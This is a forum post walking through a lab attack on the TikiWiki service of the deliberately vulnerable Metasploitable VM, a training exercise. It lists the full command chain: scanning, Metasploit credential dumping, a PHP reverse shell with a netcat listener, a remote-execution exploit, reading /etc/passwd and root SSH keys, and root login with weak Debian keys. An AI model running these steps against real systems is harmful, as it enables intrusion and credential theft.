Results 1 to 1 of 1

Thread: [Video] Metasploitable - TikiWiki

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Metasploitable - TikiWiki

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3826160
    Download video: http://www.mediafire.com/?pr702t9cp4mlkct
    Download (debian_ssh_rsa_2048_x86.tar.bz2): debian_ssh_rsa_2048_x86.tar.bz2

    What is this?

    This video demonstrates an attack on the TikiWiki service on the metasploitable hackable box.

    "Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com


    Guide
    > Use Nmap to scan the network (gathering information)
    > Use Nmap to do a more detailed scan of the target (gathering information)
    > Use Metasploit to discover the database details (gaining access)
    > [*] Can also use an exploit (gaining access)
    > Search the database from the account information (gathering information and gaining access)
    > [*] Use a web based backdoorto create shell access (remote access)
    > Automate shell accessvia Metasploit (remote access)
    > *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
    > Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
    > Connect via SSH as root (complete access)
    > Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)


    What do I need?

    > Nmap --- on Backtrack 4 (Final)
    > Metasploit --- on Backtrack 4 (Final)
    > DirBuster v0.12 --- on Backtrack 4 (Final)
    > SSH --- on Backtrack 4 (Final)
    > NetCat ---on Backtrack 4 (Final)
    > php-reverse-shell v1.0 --- http://pentestmonkey.net/tools/php-reverse-shell/
    > Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) ---http://www.mediafire.com/?i2mnwymzt51
    > Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
    > Metasploitable.part01.rar ~Metasploitable.part01.rar (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
    > Metasploitable.part02.rar ~ Metasploitable.part02.rar (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
    > Metasploitable.part03.rar ~ Metasploitable.part03.rar (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
    > Metasploitable.part04.rar ~ Metasploitable.part04.rar (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)

    Commands:

    Code:
    nmap 192.168.1.1/24
    firefox 192.168.1.105
    cd /pentest/web/dirbuster
    java -jar DirBuster-0.12.jar -u http://192.168.1.105
    firefox 192.168.1.105/tikiwiki
    msfconsole
    search tikiwiki
    use use admin/tikiwiki/tikidblib
    setg RHOST 192.168.1.105
    exploit
    firefox -> www.exploit-db.com -> TikiWiki (2701).
    firefox 192.168.1.105/tikiwiki/ -> 192.168.1.105/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
    mysql -h 192.168.1.105 -u root -p
    show databases;
    use tikiwiki195;
    show tables;
    select * from users_users;
    select login, password from users_users;
    admin
    admin
    [new passowrd]
    php reverse shell
    php-reverse-shell.php -> shell.php
    kate -> shell.php -> Replace: 127.0.0.1 with 192.168.1.103 [Our IP]. Replace: 1234 with 4321.
    http://192.168.1.103/tikiwiki/backups/shell.php
    nc -v -l -p 4321
    whoami
    hostname
    cat /etc/passwd
    search tikiwiki
    use exploit/unix/webapp/tikiwiki_graph_formula_exec
    show options
    show payloads
    setg payload generic/shell_bind_tcp
    show options
    exploit
    ls
    whoami
    cat /etc/passwd
    ls -lart /root
    ls -lart /root/.ssh
    cat /root/.ssh/authorized_keys
    firefox -> www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
    tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
    cd rsa/2048
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
    ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
    whoami
    hostname

    Notes:

    Song: Orbital - Halcyon and On and On
    Video length: 8:11
    Capture length: 21:34

    Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tikiwiki.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30077-%5Bvideo%5D-metasploitable-tikiwiki.html#post167041
    Last edited by g0tmi1k; 03-05-2011 at 02:03 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Metasploitable - MySQL
    By g0tmi1k in forum BackTrack Videos
    Replies: 4
    Last Post: 03-06-2011, 10:57 AM
  2. Owning Metasploitable with Backtrack
    By sickness in forum BackTrack Videos
    Replies: 17
    Last Post: 11-02-2010, 02:12 PM
  3. [Video] Metasploitable - PostgreSQL
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 07-01-2010, 01:22 PM
  4. Metasploitable
    By thorin in forum Beginners Forum
    Replies: 1
    Last Post: 05-25-2010, 07:07 PM
  5. Video: Nmap Video Tutorial 2: Port Scan Boogaloo
    By Irongeek in forum OLD Tutorials and Guides
    Replies: 0
    Last Post: 05-30-2008, 08:07 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •